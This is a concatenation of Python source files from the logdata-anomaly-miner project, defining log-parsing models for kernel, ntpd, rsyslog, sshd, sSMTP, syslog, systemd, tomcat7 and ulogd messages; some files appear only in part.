FixedDataModelElement("msg", b": SMTP error from remote mail server after end of data" + host_str), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s16", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code554), FixedDataModelElement("msg", b"rejected due to spam content") ]), # this is problematic as the number of arguments is variable! 
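SequenceModelElement("arg_seq", [ DelimitedDataModelElement("arg", b" "), FixedDataModelElement("s17", b" ") ]) ])) ]), # this is problematic as the number of hosts is variable!
SequenceModelElement("host_seq", [ host, FixedDataModelElement("s8", b" ") ]) ])) ]), ]) return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/KernelMsgParsingModel.py000066400000000000000000000035541437606560100332560ustar00rootroot00000000000000
"""This module defines a parser for kernelmsg."""
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement
from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """
    Return a model to parse messages from kernel logging.

    The model expects the ``kernel: `` source-name prefix, an optional ``[<timestamp>] ``
    group as printed by the kernel ring buffer, and then one of the known message types.
    A line that matches none of the known types is consumed by the ``unparsed`` catch-all.
    """
    type_children = [
        SequenceModelElement("ipv4-martian", [
            FixedDataModelElement("s0", b"IPv4: martian "),
            FixedWordlistDataModelElement("direction", [b"source", b"destination"]),
            FixedDataModelElement("s1", b" "),
            IpAddressDataModelElement("destination"),
            FixedDataModelElement("s2", b" from "),
            IpAddressDataModelElement("source"),
            FixedDataModelElement("s3", b", on dev "),
            AnyByteDataModelElement("interface")
        ]),
        SequenceModelElement("net-llheader", [
            FixedDataModelElement("s0", b"ll header: "),
            AnyByteDataModelElement("data")
        ]),
        # Catch-all: consumes the remainder of any line that matched no known type above.
        AnyByteDataModelElement("unparsed")
    ]

    model = SequenceModelElement("kernel", [
        FixedDataModelElement("sname", b"kernel: "),
        OptionalMatchModelElement("opt", SequenceModelElement("seq", [
            # The kernel prints its timestamp as "[   12.345678] ", so the optional group has to
            # open with "[". With "]" as the opening delimiter the group could never match a
            # timestamped line and every such line fell through to "unparsed" instead of the
            # structured types above.
            FixedDataModelElement("opt_s0", b"["),
            DelimitedDataModelElement("timestamp", b"]"),
            FixedDataModelElement("opt_s1", b"] "),
        ])),
        FirstMatchModelElement("msg", type_children)
    ])
    return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/NtpParsingModel.py000066400000000000000000000121261437606560100321230ustar00rootroot00000000000000
"""This module defines the parsing model for ntpd logs.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Get the model.""" interface_name_model = VariableByteDataModelElement("interface", b"0123456789abcdefghijklmnopqrstuvwxyz.") dtme = DateTimeModelElement("expire-date", b"%Y-%m-%dT%H:%M:%SZ") type_children = [ SequenceModelElement("exit", [ FixedDataModelElement("s0", b"ntpd exiting on signal "), DecimalIntegerValueModelElement("signal") ]), SequenceModelElement("listen-drop", [ FixedDataModelElement("s0", b"Listen and drop on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), FirstMatchModelElement("address", [ IpAddressDataModelElement("ipv4"), DelimitedDataModelElement("ipv6", b" "), FixedDataModelElement("ipv6_missing", b"[::]") ]), FirstMatchModelElement("udp", [ FixedDataModelElement("s3", b" UDP 123"), FixedDataModelElement("s3", b":123")]) ]), SequenceModelElement("listen-normal", [ FixedDataModelElement("s0", b"Listen normally 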
on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), IpAddressDataModelElement("ip"), FirstMatchModelElement("msg", [ FixedDataModelElement("port-new", b":123"), FixedDataModelElement("port-old", b" UDP 123") ]) ]), SequenceModelElement("listen-routing", [ FixedDataModelElement("s0", b"Listening on routing socket on fd #"), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" for interface updates") ]), SequenceModelElement("soliciting-pool", [ FixedDataModelElement("s0", b"Soliciting pool server "), IpAddressDataModelElement("pool-server-ip") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"ntpd "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" (1): Starting") ]), SequenceModelElement("no-root", [ FixedDataModelElement("s0", b"must be run as root, not uid "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("leapsecond-file", [ FixedDataModelElement("s0", b"leapsecond file ('"), DelimitedDataModelElement("file", b"'"), FixedDataModelElement("s1", b"'): "), FirstMatchModelElement("first", [ FixedDataModelElement("msg", b"good hash signature"), SequenceModelElement("seq", [ FixedDataModelElement("s2", b"loaded, expire="), dtme, FixedDataModelElement("s3", b" last="), dtme, FixedDataModelElement("s4", b" ofs="), DecimalIntegerValueModelElement("ofs") ]) ]) ]), FixedDataModelElement("unable-to-bind", b"unable to bind to wildcard address :: - another process may be running - EXITING"), FixedDataModelElement("new-interfaces", b"new interface(s) found: waking up resolver"), FixedDataModelElement("ntp-io", b"ntp_io: estimated max descriptors: 1024, initial socket boundary: 16"), FixedDataModelElement("peers-refreshed", b"peers refreshed"), FixedDataModelElement("log-file", b"logging to file /var/log/ntplog"), FixedDataModelElement("command-line", b"Command line: ntpd"), SequenceModelElement("precision", [ 
FixedDataModelElement("s0", b"proto: precision = "), DecimalFloatValueModelElement("precision"), FixedDataModelElement("s1", b" usec ("), DecimalIntegerValueModelElement("usec", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b")") ])] model = SequenceModelElement("ntpd", [ FixedDataModelElement("sname", b"ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/RsyslogParsingModel.py000066400000000000000000000075441437606560100330320ustar00rootroot00000000000000
"""This module defines a parser for rsyslog."""
from aminer.parsing.DateTimeModelElement import DateTimeModelElement
from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement
from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement
from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement
from aminer.parsing.FixedDataModelElement import FixedDataModelElement
from aminer.parsing.SequenceModelElement import SequenceModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """
    Return a model to parse rsyslogd status messages after any standard logging preamble, e.g. from syslog.

    After the ``rsyslogd`` source name and an optional numeric suffix, the message body is matched
    against the group/user id change notices, the ``[origin ...]`` state-change banner, the action
    resumed/suspended notices and the "command not permitted" notice, in that order.
    """
    gid_change = SequenceModelElement("gidchange", [
        FixedDataModelElement("s0", b"rsyslogd's groupid changed to "),
        DecimalIntegerValueModelElement("gid")
    ])
    uid_change = SequenceModelElement("uidchange", [
        FixedDataModelElement("s0", b"rsyslogd's userid changed to "),
        DecimalIntegerValueModelElement("uid")
    ])
    state_change = SequenceModelElement("statechange", [
        FixedDataModelElement("s0", b'[origin software="rsyslogd" swVersion="'),
        DelimitedDataModelElement("version", b'"'),
        FixedDataModelElement("s1", b'" x-pid="'),
        DecimalIntegerValueModelElement("pid"),
        # Both the https and the http form of the x-info URL are accepted.
        FirstMatchModelElement("fm", [
            FixedDataModelElement("s2", b'" x-info="https://www.rsyslog.com"] '),
            FixedDataModelElement("s2", b'" x-info="http://www.rsyslog.com"] ')
        ]),
        FirstMatchModelElement("type", [
            FixedDataModelElement("HUPed", b"rsyslogd was HUPed"),
            FixedDataModelElement("start", b"start")
        ])
    ])
    action_resumed = SequenceModelElement("resumed", [
        FixedDataModelElement("s1", b"' resumed (module '"),
        DelimitedDataModelElement("module", b"'"),
        FixedDataModelElement("s2", b"') [try http://www.rsyslog.com/e/"),
        DecimalIntegerValueModelElement("number"),
        FixedDataModelElement("s3", b" ]")
    ])
    # NOTE(review): the id "s2" appears twice in this sequence; renaming it would change the
    # match path seen by existing configurations, so it is kept as-is — confirm whether intended.
    action_suspended = SequenceModelElement("suspended", [
        FixedDataModelElement("s1", b"' suspended, next retry is "),
        DelimitedDataModelElement("dayname", b" "),
        FixedDataModelElement("s2", b" "),
        DateTimeModelElement("dtme", b"%b %d %H:%M:%S %Y"),
        FixedDataModelElement("s2", b" [try http://www.rsyslog.com/e/"),
        DecimalIntegerValueModelElement("number"),
        FixedDataModelElement("s3", b" ]")
    ])
    action_state = SequenceModelElement("action", [
        FixedDataModelElement("s0", b"action '"),
        DelimitedDataModelElement("action", b"'"),
        FirstMatchModelElement("fm", [action_resumed, action_suspended]),
    ])
    command_refused = SequenceModelElement("cmd", [
        FixedDataModelElement("s0", b"command '"),
        DelimitedDataModelElement("command", b"'"),
        FixedDataModelElement(
            "s1", b"' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? ["),
        DelimitedDataModelElement("version", b"]", consume_delimiter=True)
    ])

    # FirstMatchModelElement tries the alternatives in list order, so the order is preserved.
    type_children = [gid_change, state_change, uid_change, action_state, command_refused]

    # rsyslogd may log as "rsyslogd", "rsyslogd<n>" or "rsyslogd-<n>" before the ": " separator.
    source_suffix = OptionalMatchModelElement("opt", FirstMatchModelElement("fm", [
        DecimalIntegerValueModelElement("number"),
        SequenceModelElement("seq", [
            FixedDataModelElement("s0", b"-"),
            DecimalIntegerValueModelElement("number")
        ])
    ]))
    return SequenceModelElement("rsyslog", [
        FixedDataModelElement("sname", b"rsyslogd"),
        source_suffix,
        FixedDataModelElement("s0", b": "),
        FirstMatchModelElement("msg", type_children)
    ])
logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/generic/SshdParsingModel.py000066400000000000000000000434211437606560100322650ustar00rootroot00000000000000
"""This module provides support for parsing of sshd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a sshd information message after any standard logging preamble, e.g. 
from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") from_str = b" from " port = b" port " preauth = b" [preauth]" type_children = [ SequenceModelElement("accepted key", [ FixedDataModelElement("s0", b"Accepted publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2: "), DelimitedDataModelElement("asym-algorithm", b" ", consume_delimiter=True), VariableByteDataModelElement("fingerprint", b"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/:"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s4", b" ID "), DelimitedDataModelElement("id", b" "), FixedDataModelElement("s5", b" (serial "), DecimalIntegerValueModelElement("serial"), FixedDataModelElement("s6", b") CA "), AnyByteDataModelElement("algorithm_details") ])) ]), SequenceModelElement("btmp-perm", [ FixedDataModelElement("s0", b"Excess permission or bad ownership on file /var/log/btmp") ]), SequenceModelElement("close-sess", [ FixedDataModelElement("s0", b"Close session: user "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" id "), DecimalIntegerValueModelElement("userid") ]), SequenceModelElement("closing", [ FixedDataModelElement("s0", b"Closing connection to "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("closed", [ FixedDataModelElement("s0", b"Connection closed by "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("clientip"), SequenceModelElement("seq", [ FixedWordlistDataModelElement("user-type", [b"authenticating", b"invalid"]), 
FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("ip"), IpAddressDataModelElement("ipv6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s4", b" [preauth]") ]) ]) ]), SequenceModelElement("connect", [ FixedDataModelElement("s0", b"Connection from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b" on "), IpAddressDataModelElement("serverip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("sport") ]), SequenceModelElement("disconnectreq", [ FixedDataModelElement("s0", b"Received disconnect from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b":"), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s3", b": "), FixedWordlistDataModelElement("reason", [b"disconnected by user"]) ]), SequenceModelElement("disconnected", [ FixedDataModelElement("s0", b"Disconnected from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), FixedDataModelElement("error-bind", b"error: bind: Cannot assign requested address"), SequenceModelElement("error-max-auth", [ FixedDataModelElement("s0", b"error: maximum authentication attempts exceeded for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), 
FixedDataModelElement("error-cert-exp", b"error: Certificate invalid: expired"), FixedDataModelElement("error-cert-not-yet-valid", b"error: Certificate invalid: not yet valid"), FixedDataModelElement("error-cert-not-listed-principal", b"error: Certificate invalid: name is not a listed principal"), FixedDataModelElement("error-refused-by-options", b"error: Refused by certificate options"), SequenceModelElement("error-channel-setup", [ FixedDataModelElement("s0", b"error: channel_setup_fwd_listener: cannot listen to port: "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("error-auth-key", [ FixedDataModelElement("s0", b"error: Authentication key "), DelimitedDataModelElement("asym-algorithm", b" "), FixedDataModelElement("s1", b" "), DelimitedDataModelElement("hash", b" "), FixedDataModelElement("s2", b" revoked by file "), AnyByteDataModelElement("file") ]), SequenceModelElement("error-load-key", [ FixedDataModelElement("s0", b"error: Could not load host key: "), AnyByteDataModelElement("file") ]), SequenceModelElement("ident-missing", [ FixedDataModelElement("s0", b"Did not receive identification string from "), IpAddressDataModelElement("clientip") ]), SequenceModelElement("invalid-user", [ FixedDataModelElement("s0", b"Invalid user "), DelimitedDataModelElement("user", from_str), FixedDataModelElement("s1", from_str), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("invalid-user-auth-req", [ FixedDataModelElement("s0", b"input_userauth_request: invalid user "), DelimitedDataModelElement("user", preauth), FixedDataModelElement("s1", preauth) ]), SequenceModelElement("postppk", [ FixedDataModelElement("s0", b"Postponed publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), 
DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), SequenceModelElement("readerr", [ FixedDataModelElement("s0", b"Read error from remote host "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", b": Connection timed out") ]), SequenceModelElement("disconnect", [ FixedDataModelElement("s0", b"Received disconnect from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s1", b": 11: "), FirstMatchModelElement("reason", [ FixedDataModelElement("disconnected", b"disconnected by user"), SequenceModelElement("remotemsg", [ DelimitedDataModelElement("msg", preauth), FixedDataModelElement("s0", preauth) ]) ]) ]), SequenceModelElement("signal", [ FixedDataModelElement("s0", b"Received signal "), DecimalIntegerValueModelElement("signal"), FixedDataModelElement("s1", b"; terminating.") ]), SequenceModelElement("server", [ FixedDataModelElement("s0", b"Server listening on "), DelimitedDataModelElement("serverip", b" "), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b".") ]), SequenceModelElement("oom-adjust", [ FixedDataModelElement("s0", b"Set /proc/self/oom_score_adj "), OptionalMatchModelElement("from", FixedDataModelElement("default", b"from 0 ")), FixedDataModelElement("s1", b"to "), DecimalIntegerValueModelElement("newval", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ]), SequenceModelElement("session-start", [ FixedDataModelElement("s0", b"Starting session: "), FirstMatchModelElement("sess-info", [ SequenceModelElement("shell", [ FixedDataModelElement("s0", b"shell on "), DelimitedDataModelElement("terminal", b" ") ]), SequenceModelElement("subsystem", [ FixedDataModelElement("s0", b"subsystem \"sftp\"") ]), SequenceModelElement("forced-command", [ FixedDataModelElement("s0", b"forced-command (key-option) \""), 
DelimitedDataModelElement("command", b"\" for "), FixedDataModelElement("s1", b"\"") ]) ]), FixedDataModelElement("s1", b" for "), user_name_model, FixedDataModelElement("s2", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("idinfo", SequenceModelElement("idinfo", [ FixedDataModelElement("s0", b" id "), DecimalIntegerValueModelElement("id") ])) ]), SequenceModelElement("transferred", [ FixedDataModelElement("s0", b"Transferred: sent "), DecimalIntegerValueModelElement("sent"), FixedDataModelElement("s1", b", received "), DecimalIntegerValueModelElement("received"), FixedDataModelElement("s1", b" bytes")]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(sshd:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]), SequenceModelElement("child", [ FixedDataModelElement("s0", b"User child is on pid "), DecimalIntegerValueModelElement("pid") ]), SequenceModelElement("failed/accept", [ FixedWordlistDataModelElement("s0", [b"Failed ", b"Accepted "]), FixedWordlistDataModelElement("type", [b"password", b"none", b"publickey"]), FixedDataModelElement("s1", b" for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("service") ]), SequenceModelElement("disconnecting", [ FixedDataModelElement("s0", b"Disconnecting "), FixedWordlistDataModelElement("type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), 
DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b": Too many authentication failures [preauth]") ]), SequenceModelElement("fatal", [ FixedDataModelElement("s0", b"fatal: Timeout before authentication for "), IpAddressDataModelElement("ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("cert-auth", [ FixedDataModelElement("s0", b"cert: Authentication tried for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" with valid certificate but not from a permitted source address ("), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b")."), ]), SequenceModelElement("change-root-dir", [ FixedDataModelElement("s0", b"Changed root directory to \""), DelimitedDataModelElement("root-dir", b"\""), FixedDataModelElement("s1", b"\"") ]), FixedDataModelElement("subsystem-request", b"subsystem request for sftp"), SequenceModelElement("conn-write-poll", [ FixedDataModelElement("s0", b"packet_write_poll: Connection from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b": Host is down") ]), SequenceModelElement("debug", [ FixedDataModelElement("s0", b"debug"), DecimalIntegerValueModelElement("debug-num"), FixedDataModelElement("s1", b": "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("s2", b"Got "), DecimalIntegerValueModelElement("num1"), FixedDataModelElement("s3", b"/"), DecimalIntegerValueModelElement("num2"), FixedDataModelElement("s4", b" for keepalive") ]), SequenceModelElement("seq2", [ FixedDataModelElement("s2", b"channel "), DecimalIntegerValueModelElement("channel-num"), FixedDataModelElement("s3", b": request "), DelimitedDataModelElement("mail", b" "), 
def get_model():
    """
    Return the parser for sSMTP syslog lines of the form ``sSMTP[<pid>]: <message>``.

    Two message shapes are recognised: the verbose
    "Sent mail for <to-addr> (<status>) uid=<n> username=<name> outbytes=<n>" line and the short
    "<program> sent mail for <user>" line.
    NOTE(review): both alternatives carry the element id "sent", so presumably they end up under the same
    match path below /ssmtp/msg — confirm this is intended before keying detectors on that path.
    """
    verbose_sent = SequenceModelElement("sent", [
        FixedDataModelElement("s0", b"Sent mail for "),
        DelimitedDataModelElement("to-addr", b" ("),
        FixedDataModelElement("s1", b" ("),
        DelimitedDataModelElement("status", b") uid="),
        FixedDataModelElement("s2", b") uid="),
        DecimalIntegerValueModelElement("uid"),
        FixedDataModelElement("s3", b" username="),
        DelimitedDataModelElement("username", b" outbytes="),
        FixedDataModelElement("s4", b" outbytes="),
        DecimalIntegerValueModelElement("bytes")
    ])
    # Short form: the trailing "user" element is an AnyByte element, i.e. (judging by its name) the rest of
    # the line is accepted without any further validation.
    short_sent = SequenceModelElement("sent", [
        DelimitedDataModelElement("program", b" "),
        FixedDataModelElement("s0", b" sent mail for "),
        AnyByteDataModelElement("user")
    ])
    return SequenceModelElement("ssmtp", [
        FixedDataModelElement("sname", b"sSMTP["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", [verbose_sent, short_sent])
    ])
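def get_model(time_model=None, start_year=2020):
    """
    Return the model for parsing a standard syslog preamble: timestamp, space, hostname, space.

    @param time_model when not None, the given model element is used for parsing timestamps. Otherwise a standard
    DateTimeModelElement with format b"%b %d %H:%M:%S" is created.
    @param start_year year handed to that default DateTimeModelElement, because the classic syslog timestamp
    carries no year of its own. Only used when time_model is None. Defaults to 2020, the value that was
    previously hard-coded, so existing callers are unaffected; pass the year of the data you are replaying.
    CAVEAT: the standard model may not work when log data timestamp locale does not match host or shell
    environment locale. See MultiLocaleDateTimeModelElement instead.
    """
    if time_model is None:
        time_model = DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=start_year)
    # Lowercase letters, digits, '-' and '.' only: a hostname containing anything else (e.g. uppercase letters)
    # does not match this element, so presumably the whole line is then reported as unparsed.
    host_name_model = VariableByteDataModelElement("host", b"-.01234567890abcdefghijklmnopqrstuvwxyz")
    return SequenceModelElement("syslog", [
        time_model,
        FixedDataModelElement("sp0", b" "),
        host_name_model,
        FixedDataModelElement("sp1", b" ")
    ])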
FixedDataModelElement("apt-daily-started", b"Started Daily apt upgrade and clean activities."), FixedDataModelElement("apt-daily-finished", b"Finished Daily apt upgrade and clean activities."), SequenceModelElement("service-succeeded", [ DelimitedDataModelElement("service", b" "), FixedDataModelElement("s0", b" Succeeded.") ]), FixedDataModelElement("clean-php", b"Finished Clean php session files."), FixedDataModelElement("finished-logrotate", b"Finished Rotate log files."), FixedDataModelElement("finished-man-db-daily", b"Finished Daily man-db regeneration."), FixedDataModelElement("finished-ubuntu-advantages", b"Finished Ubuntu Advantage APT and MOTD Messages."), FixedDataModelElement("finished-refresh", b"Finished Refresh fwupd metadata and update motd."), FixedDataModelElement("finished-daily-apt", b"Finished Daily apt download activities."), SequenceModelElement("apt-daily-timer", [ FixedDataModelElement("s0", b"apt-daily.timer: Adding "), OptionalMatchModelElement("hopt", SequenceModelElement("hblock", [ DecimalIntegerValueModelElement("hours"), FixedDataModelElement("s1", b"h ") ])), DecimalIntegerValueModelElement("minutes"), FixedDataModelElement("s2", b"min "), DecimalFloatValueModelElement("seconds"), FixedDataModelElement("s3", b"s random time.") ]), FixedDataModelElement("tmp-file-cleanup", b"Starting Cleanup of Temporary Directories..."), FixedDataModelElement("tmp-file-cleanup-started", b"Started Cleanup of Temporary Directories."), SequenceModelElement("killing-process", [ DelimitedDataModelElement("service", b":"), FixedDataModelElement("s0", b": Killing process "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", b" (update-notifier) with signal SIGKILL.") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"Starting "), DelimitedDataModelElement("service", b"."), FixedDataModelElement("s1", b"...") ]), SequenceModelElement("started", [ FixedDataModelElement("s0", b"Started "), 
def get_logind_model(user_name_model=None):
    """
    Return a model to parse a systemd logind daemon message after any standard logging preamble, e.g. from syslog.

    @param user_name_model element used for the user name in "New session <n> of user <name>.". When None, a
    VariableByteDataModelElement over lowercase letters, digits, '-' and '_' is used. That character set
    deliberately has no '.', so the message's trailing "." is left for the fixed "s2" element; a user name
    model that also accepts '.' would swallow it and the sequence would no longer match.
    """
    if user_name_model is None:
        user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz-_")

    new_session = SequenceModelElement("new session", [
        FixedDataModelElement("s0", b"New session "),
        DecimalIntegerValueModelElement("session"),
        FixedDataModelElement("s1", b" of user "),
        user_name_model,
        FixedDataModelElement("s2", b".")
    ])
    removed_session = SequenceModelElement("removed session", [
        FixedDataModelElement("s0", b"Removed session "),
        DecimalIntegerValueModelElement("session"),
        FixedDataModelElement("s1", b".")
    ])
    logged_out = SequenceModelElement("logged out", [
        FixedDataModelElement("s0", b"Session "),
        DecimalIntegerValueModelElement("session"),
        FixedDataModelElement("s1", b" logged out. Waiting for processes to exit.")
    ])
    failed_abandon = FixedDataModelElement(
        "failed abandon", b"Failed to abandon session scope: Transport endpoint is not connected")

    # Will fail on username models including the dot at the end.
    message = FirstMatchModelElement("msg", [new_session, removed_session, logged_out, failed_abandon])
    return SequenceModelElement("systemd-logind", [
        FixedDataModelElement("sname", b"systemd-logind["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        message
    ])
def get_model():
    """
    Return the parser for tomcat7 syslog lines of the form ``tomcat7[<pid>]: <message>``.

    The last alternative, AnyByteDataModelElement("unparsed"), acts as a catch-all: a tomcat7 message that is
    none of the three fixed strings presumably still parses (ending up under the "unparsed" element) instead
    of being handed to the unparsed-atom handler. Keep that in mind when relying on unparsed-atom reporting
    to notice unexpected tomcat output.
    """
    fixed_messages = [
        ("start", b" * Starting Tomcat servlet engine tomcat7"),
        ("stop", b" * Stopping Tomcat servlet engine tomcat7"),
        ("done", b" ...done."),
    ]
    alternatives = [FixedDataModelElement(element_id, text) for element_id, text in fixed_messages]
    alternatives.append(AnyByteDataModelElement("unparsed"))
    return SequenceModelElement("tomcat7", [
        FixedDataModelElement("sname", b"tomcat7["),
        DecimalIntegerValueModelElement("pid"),
        FixedDataModelElement("s0", b"]: "),
        FirstMatchModelElement("msg", alternatives)
    ])
DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model for su session information messages after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("build-stack", [ FixedDataModelElement("s0", b"building new pluginstance stack: \""), DelimitedDataModelElement("stack", b"\""), FixedDataModelElement("s1", b"\"") ]), SequenceModelElement("nfct-event", [ FixedDataModelElement("s0", b"[DESTROY] ORIG: SRC="), IpAddressDataModelElement("osrcip"), FixedDataModelElement("s1", b" DST="), IpAddressDataModelElement("odstip"), FixedDataModelElement("s2", b" PROTO="), FixedWordlistDataModelElement("proto", [b"TCP", b"UDP"]), FixedDataModelElement("s3", b" SPT="), DecimalIntegerValueModelElement("ospt"), FixedDataModelElement("s4", b" DPT="), DecimalIntegerValueModelElement("odpt"), FixedDataModelElement("s5", b" PKTS="), DecimalIntegerValueModelElement("opkts"), FixedDataModelElement("s6", b" BYTES="), 